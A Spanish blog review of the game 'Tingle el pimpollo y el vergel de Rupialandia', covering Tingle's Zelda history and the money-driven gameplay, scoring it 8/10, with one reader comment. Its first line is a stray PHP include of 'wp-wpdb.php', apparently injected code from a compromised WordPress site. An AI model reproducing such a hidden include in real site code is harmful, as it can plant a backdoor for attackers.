if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Tingle el pimpollo y el vergel de Rupialandia ¡Tienes que probarlo! – La Fortaleza de LeChuck

Tingle el pimpollo y el vergel de Rupialandia ¡Tienes que probarlo!

Para muchas personas Tingle es a Zelda lo que Jar Jar Binks a Star Wars, sin embargo yo soy de los que piensan que la ventura siempre es bien recibida. Es difícil acertar cuando se intenta introducir un cambio en una saga con unas características tan bien asentadas y con unos protagonistas tan brillantemente definidos, pero sin duda, el momento en el que se introdujo a este nuevo personaje en el universo Zelda no pudo ser más adecuado.

Tingle apareció por primera vez en el trascendental The Legend of Zelda: Majora’s Mask, título arriesgado que pese diferir bastante con The Legend of Zelda: Ocarina of Time, supo deleitar a todo el mundo y actualmente sigue siendo uno de los mejores Zelda de todos los tiempos. Este genial personaje provoca una sensación agridulce que no deja indiferente a nadie, y es precisamente eso lo que hace de Tingle un personaje inolvidable.

Kooloo-Limpah!

Si Luigi tuvo que esperar un largo período de tiempo para contar con su propia aventura, para Tingle, la espera fue, incomprensiblemente, bastante más llevadera, y digo incomprensiblemente porque nunca ha sido un personaje muy querido. Después de aparecer en The Legend of Zelda: Majora’s Mask también lo hizo en otros títulos de la saga como The Legend of Zelda: Oracle of Ages, The Legend of Zelda: The Wind Waker y The Legend of Zelda: The Minish Cap. Su primera aventura en solitario, Freshly-Picked Tingle’s Rosy Rupeeland (Tingle el pimpollo y el vergel de Rupialandia), salió a la venta el 2 de Septiembre de 2006 en Japón y un año después en Europa.


He de confesaros que lo que me llevó a adquirir el juego fue que, como fiel seguidor de Zelda que soy, no podía dejar pasar la oportunidad de hacerme con un título relevante a la franquicia. La primera vez que lo probé me pareció un juego muy original y totalmente diferente a cualquier Zelda. Conforme lo fui jugando me di cuenta de que me encontraba ante un juego excelente, divertidísimo y absurdo, muy absurdo.


El juego gira alrededor del dinero y la mecánica del mismo es muy sencilla, a pesar de mezclar elementos de diversos géneros, como el rol, juegos caracterizados por su cuidada elaboración, o los plataformas, intuitivos como ellos solos. Nuestro principal objetivo es el de recaudar todas las rupias que podamos para poder llegar a Rupialandia, lugar que podremos alcanzar siempre que estemos dispuestos a pagar un alto precio a Don Rupia. Para obtener las codiciadas rupias tendremos que ayudar a nuestros vecinos para sonsacarles información (pagando) y poder atravesar mazmorras (pagando) junto a un aliado (pagando) que nos será de gran ayuda a la hora de vencer a nuestros enemigos y conseguir los mayores tesoros del mundo.
También contaremos con la ayuda de un hada llamada Pinkle y con la compañía de un pequeño y adorable perrete de nombre Guagle. Pinkle es nuestra hada asistenta y es la encargada de ayudarnos a encontrar las rupias y Guagle nos corresponderá con lo que más nos gusta cuando le demos unos huesos.

Guagle

La aventura es profunda, y los personajes son geniales y carismáticos. Los diálogos son ingeniosos y divertidísimos, es un juego con el que seguro disfrutaréis si no lo habéis hecho ya. Insto a toda aquel que no lo haya jugado a que pruebe esta magnífica aventura, no os arrepentiréis… Tingle os lo agradecerá.

Nota: 8/10

Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

6 comentarios

  1. Este juego me encanta, sobretodo cuando tienes que decidir un precio por algo xD y como dspués se les ve en la cara que te han timado. Y lo peor, si te quedas corto se quedan con el dinero igualmente. Ese mundo está lleno de aprovechados xD

Dejar un comentario